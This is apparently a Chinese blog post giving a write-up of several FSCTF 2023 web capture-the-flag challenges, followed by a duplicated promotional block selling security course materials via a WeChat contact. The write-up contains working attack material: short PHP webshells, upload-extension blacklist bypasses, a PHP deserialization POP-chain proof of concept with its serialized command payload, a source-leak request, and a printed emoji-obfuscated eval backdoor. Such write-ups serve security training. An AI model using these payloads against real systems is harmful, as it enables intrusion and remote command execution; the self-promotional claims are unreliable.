FSCTF 2023——Web方向WP,网络安全工程师面试题目

改为User-Agent: FSCTF Browser

得到新的提示,需要本地访问

添加Referer:127.0.0.1

没有什么有用的回显信息,我们用伪协议读取:

php://filter/read=convert.base64-encode/resource=flag.php

得到PD9waHANCiRmbGFnPSJOU1NDVEZ7YTU3NjA5N2EtZTM0OS00YTZjLWI1OTQtMTI4NDQwNTI1ZWJifSI7DQo/Pg==

base64解密后得到flag

寻找蛛丝马迹

题目描述

睁大眼睛,保护视力

先查看一下源码(F12或者ctrl+u),得到flag第一段

继续找,在css文件里发现flag第二段

再找,在js文件里发现flag第三段

继续翻找,没啥发现了,决定目录扫描一下(dirsearch)

扫出robots.txt和www.zip ,先访问下robots.txt

出现一堆乱码,这时我们可以用火狐自带的修复文字编码来处理,得到flag第四段

看到苹果,可以想到.DS_store,得到flag第五段

下载www.zip ,得到flag第六段

是兄弟,就来传你の🐎!

题目描述

你真的懂文件上传吗?

首先上传一个常规的php一句话木马,返回不允许(意料之中)!

经过多次尝试,得到最终的payload

访问上传路径,得到flag

总结

图片文件头:bmp文件 BM ;gif文件 GIF

php文件后缀黑名单绕过:pht, phpt, phtml, php3,php4,php5,php6

超短webshell ,读取根目录下的所有文件

<?=`nl /\*`; 、<?=`cat /\*`;、<?=`tac /\*`;等等(注意这里是反引号)

ez_php2

题目描述

简单的pop链

题目源码如下:

<?php highlight_file(__file__); Class Rd{ public $ending; public $cl; public $poc; public function __destruct() { echo "All matters have concluded"; die($this->ending); } public function __call($name, $arg) { foreach ($arg as $key =>$value) { if($arg[0]['POC']=="1111") { echo "1"; $this->cl->var1 = "system"; } } } } class Poc{ public $payload; public $fun; public function __set($name, $value) { $this->payload = $name; $this->fun = $value; } function getflag($paylaod) { echo "Have you genuinely accomplished what you set out to do?"; file_get_contents($paylaod); } } class Er{ public $symbol; public $Flag; public function __construct() { $this->symbol = True; } public function __set($name, $value) { $value($this->Flag); } } class Ha{ public $start; public $start1; public $start2; public function __construct() { echo $this->start1."__construct".""; } public function __destruct() { if($this->start2==="11111") { $this->start1->Love($this->start); echo "You are Good!"; } } } if(isset($_GET['Ha_rde_r'])) { unserialize($_GET['Ha_rde_r']); } else{ die("You are Silly goose!"); } ?> You are Silly goose!

又到了熟悉的代码审计环节,构造出pop链如下:

Ha __destruct()-> Rd __call()-> Er __set()

完整的poc:

<?php Class Rd{ public $ending; public $cl; public $poc; } class Er{ public $symbol; public $Flag; } class Ha{ public $start; public $start1; public $start2 = "11111"; } $Ha_start_dic = array( "POC" => "1111" ); $Ha_start = array($Ha_start_dic); $Ha_start1 = new Rd(); $Ha_start1_cl = new Er(); $Ha_start1_cl->Flag = "cat /flag"; $ha = new Ha(); $ha->start = $Ha_start_dic; $ha->start1 = $Ha_start1; $Ha_start1->cl = $Ha_start1_cl; echo urlencode(serialize($ha)); ?>

运行后得到:

O%3A2%3A%22Ha%22%3A3%3A%7Bs%3A5%3A%22start%22%3Ba%3A1%3A%7Bs%3A3%3A%22POC%22%3Bs%3A4%3A%221111%22%3B%7Ds%3A6%3A%22start1%22%3BO%3A2%3A%22Rd%22%3A3%3A%7Bs%3A6%3A%22ending%22%3BN%3Bs%3A2%3A%22cl%22%3BO%3A2%3A%22Er%22%3A2%3A%7Bs%3A6%3A%22symbol%22%3BN%3Bs%3A4%3A%22Flag%22%3Bs%3A9%3A%22cat+%2Fflag%22%3B%7Ds%3A3%3A%22poc%22%3BN%3B%7Ds%3A6%3A%22start2%22%3Bs%3A5%3A%2211111%22%3B%7D

构造url ,得到flag

?Ha_rde_r=O%3A2%3A"Ha"%3A3%3A{s%3A5%3A"start"%3Ba%3A1%3A{s%3A3%3A"POC"%3Bs%3A4%3A"1111"%3B}s%3A6%3A"start1"%3BO%3A2%3A"Rd"%3A3%3A{s%3A6%3A"ending"%3BN%3Bs%3A2%3A"cl"%3BO%3A2%3A"Er"%3A2%3A{s%3A6%3A"symbol"%3BN%3Bs%3A4%3A"Flag"%3Bs%3A9%3A"cat+%2Fflag"%3B}s%3A3%3A"poc"%3BN%3B}s%3A6%3A"start2"%3Bs%3A5%3A"11111"%3B}

参考博客:[FSCTF 2023]ez_php2 WP-CSDN博客文章浏览阅读114次。传参请求,拿到flag。_[fsctf 2023]ez_php2外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传https://blog.csdn.net/SmillPig/article/details/135052080

签到plus

题目描述

harder在洗脚的时候服务器被黑客接管了,让你帮忙排查,你可以抢回来吗?

目录扫描一下,发现shell.php

访问/shell.php,在环境里面发现了一个假的flag

思考片刻,去搜了一下发现是“PHP<=7.4.21 Development Server源码泄露漏洞”

PHP<=7.4.21 Development Server源码泄露漏洞PHP<=7.4.21 Development Server源码泄露漏洞icon-default.png?t=N7T8https://buaq.net/go-147962.htmlpoc如下(burp):

GET /shell.php HTTP/1.1
Host: node4.anna.nssctf.cn:28528

GET /1 HTTP/1.1

使用burp在重放器选项中关闭自动更新content-length,将抓包内容导出来,得到

<?xml version="1.0"?> <!ATTLIST items burpVersion CDATA ""> <!ATTLIST items exportTime CDATA ""> <!ELEMENT item (time, url, host, port, protocol, method, path, extension, request, status, responselength, mimetype, response, comment)> <!ELEMENT time (#PCDATA)> <!ELEMENT url (#PCDATA)> <!ELEMENT host (#PCDATA)> <!ATTLIST host ip CDATA ""> <!ELEMENT port (#PCDATA)> <!ELEMENT protocol (#PCDATA)> <!ELEMENT method (#PCDATA)> <!ELEMENT path (#PCDATA)> <!ELEMENT extension (#PCDATA)> <!ELEMENT request (#PCDATA)> <!ATTLIST request base64 (true|false) "false"> <!ELEMENT status (#PCDATA)> <!ELEMENT responselength (#PCDATA)> <!ELEMENT mimetype (#PCDATA)> <!ELEMENT response (#PCDATA)> <!ATTLIST response base64 (true|false) "false"> <!ELEMENT comment (#PCDATA)>

]>



<![CDATA[http://node4.anna.nssctf.cn:28358/shell.php]]>
node4.anna.nssctf.cn
28358
http
<![CDATA[GET]]>
<![CDATA[/shell.php]]>
php
<![CDATA[R0VUIC9zaGVsbC5waHAgSFRUUC8xLjENCkhvc3Q6IG5vZGU0LmFubmEubnNzY3RmLmNuOjI4NTI4DQoNCg0KR0VUIC8xIEhUVFAvMS4xDQoNCg==]]>
200
573

<![CDATA[SFRUUC8xLjEgMjAwIE9LDQpIb3N0OiBub2RlNC5hbm5hLm5zc2N0Zi5jbjoyODUyOA0KRGF0ZTogRnJpLCAyMiBNYXIgMjAyNCAwOTozODozNCBHTVQNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LUxlbmd0aDogNDQzDQoNCjw/cGhwCnBocGluZm8oKTsKJPCfmIA9ImEiOwok8J+YgT0iYiI7CiTwn5iCPSJjIjsKJPCfpKM9ImQiOwok8J+Ygz0iZSI7CiTwn5iEPSJmIjsKJPCfmIU9ImciOwok8J+Yhj0iaCI7CiTwn5iJPSJpIjsKJPCfmIo9ImoiOwok8J+Yiz0iayI7CiTwn5iOPSJsIjsKJPCfmI09Im0iOwok8J+YmD0ibiI7CiTwn5iXPSJvIjsKJPCfmJk9InAiOwok8J+Ymj0icSI7CiTwn5mCPSJyIjsKJPCfpJc9InMiOwok8J+kqT0idCI7CiTwn6SUPSJ1IjsKJPCfpKg9InYiOwok8J+YkD0idyI7CiTwn5iRPSJ4IjsKJPCfmLY9InkiOwok8J+ZhD0ieiI7Cgok8J+YrSA9ICTwn5iZLiAk8J+YgC4gJPCfpJcuICTwn6SXLiAk8J+kqS4gJPCfmIYuICTwn5mCLiAk8J+klDsKCmlmIChpc3NldCgkX0dFVFsn8J+RvfCfppAnXSkpIHsKICAgIGV2YWwoJPCfmK0oJF9HRVRbJ/Cfkb3wn6aQJ10pKTsKfTsKCj8+]]>


对response密文解密得到

HTTP/1.1 200 OK
Host: node4.anna.nssctf.cn:28528
Date: Fri, 22 Mar 2024 09:38:34 GMT
Connection: close
Content-Length: 443

<?php phpinfo(); $😀="a"; $😁="b"; $😂="c"; $🤣="d"; $😃="e"; $😄="f"; $😅="g"; $😆="h"; $😉="i"; $😊="j"; $😋="k"; $😎="l"; $😍="m"; $😘="n"; $😗="o"; $😙="p"; $😚="q"; $🙂="r"; $🤗="s"; $🤩="t"; $🤔="u"; $🤨="v"; $😐="w"; $😑="x"; $😶="y"; $🙄="z"; $😭 = $😙. $😀. $🤗. $🤗. $🤩. $😆. $🙂. $🤔; if (isset($_GET['👽🦐'])) { eval($😭($_GET['👽🦐'])); }; ?>

构造payload(get传参)

?👽🦐=cat /f*

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新

如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
img

本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。

最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。

最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!下面就开始进入正题,如何从一个萌新一步一步进入网络安全行业。

学习路线图

其中最为瞩目也是最为基础的就是网络安全学习路线图,这里我给大家分享一份打磨了3个月,已经更新到4.0版本的网络安全学习路线图。

相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。

网络安全工具箱

当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份我自己整理的网络安全入门工具以及使用教程和实战。

项目实战

最后就是项目实战,这里带来的是SRC资料&HW资料,毕竟实战是检验真理的唯一标准嘛~

面试题

归根结底,我们的最终目的都是为了就业,所以这份结合了多位朋友的亲身经验打磨的面试题合集你绝对不能错过!

一个人可以走的很快,但一群人才能走的更远。如果你从事以下工作或对以下感兴趣,欢迎戳这里加入程序员的圈子,让我们一起学习成长!

AI人工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算

目实战

最后就是项目实战,这里带来的是SRC资料&HW资料,毕竟实战是检验真理的唯一标准嘛~

面试题

归根结底,我们的最终目的都是为了就业,所以这份结合了多位朋友的亲身经验打磨的面试题合集你绝对不能错过!

一个人可以走的很快,但一群人才能走的更远。如果你从事以下工作或对以下感兴趣,欢迎戳这里加入程序员的圈子,让我们一起学习成长!

AI人工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值